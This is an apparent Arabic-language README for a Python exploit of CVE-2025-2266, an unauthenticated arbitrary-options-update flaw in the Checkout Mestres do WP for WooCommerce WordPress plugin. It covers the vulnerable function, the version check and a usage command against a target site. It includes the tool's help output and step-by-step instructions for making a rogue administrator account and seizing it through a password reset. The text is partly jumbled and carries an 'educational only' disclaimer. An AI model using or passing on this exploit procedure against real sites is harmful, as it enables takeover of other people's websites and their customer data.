
Checkout Mestres do WP for WooCommerce 8.6.5 - 8.7.5 - تحديث تعسفي للخيارات بدون مصادقة
إضافة Checkout Mestres do WP for WooCommerce لووردبريس تتأثر بـثغرة تحديث خيارات عشوائية دون مصادقة في الإصدارات من 8.6.5 إلى 8.7.5.
الدالة المعرضة للخطر cwmpUpdateOptions() تفتقر إلى فحوصات الصلاحيات المناسبة، مما يسمح لـمهاجمين غير مصادَق عليهم بتحديث خيارات ووردبريس بشكل عشوائي.
يمكن للمهاجم:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hيستغل هذا السكربت المكتوب بلغة بايثون الثغرة من أجل:
administrator كدور افتراضيrequests (التثبيت عبر pip install requests)8.6.5 – 8.7.5)يتحقق السكربت من إصدار الإضافة عبر:
/wp-content/plugins/checkout-mestres-wp/readme.txt
إذا كانت الإضافة معرضة للخطر:
يسجّل مستخدمًا جديدًا (الافتراضي: nxploited) بصلاحيات مدير
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| الخيار | الوصف |
|---|---|
-u, --url |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
بعد إنشاء المستخدم:
قم بزيارة صفحة تسجيل الدخول:
http://target.com/wordpress/wp-login.php
انقر على "فقدت كلمة المرور؟"
[email protected])عيّن كلمة مرور واحصل على صلاحية مدير كاملة 🎯
الاستغلال بواسطة Nxploited | Khaled Alenazi
⚠️ هذا السكربت مخصص للأغراض التعليمية والاختبار المصرح به فقط.
| رابط موقع ووردبريس المستهدف (مطلوب) |
-newuser | إنشاء مستخدم مدير جديد (اسم المستخدم الافتراضي: nxploited) |
-email | البريد الإلكتروني للمستخدم الجديد (الافتراضي: [email protected]) |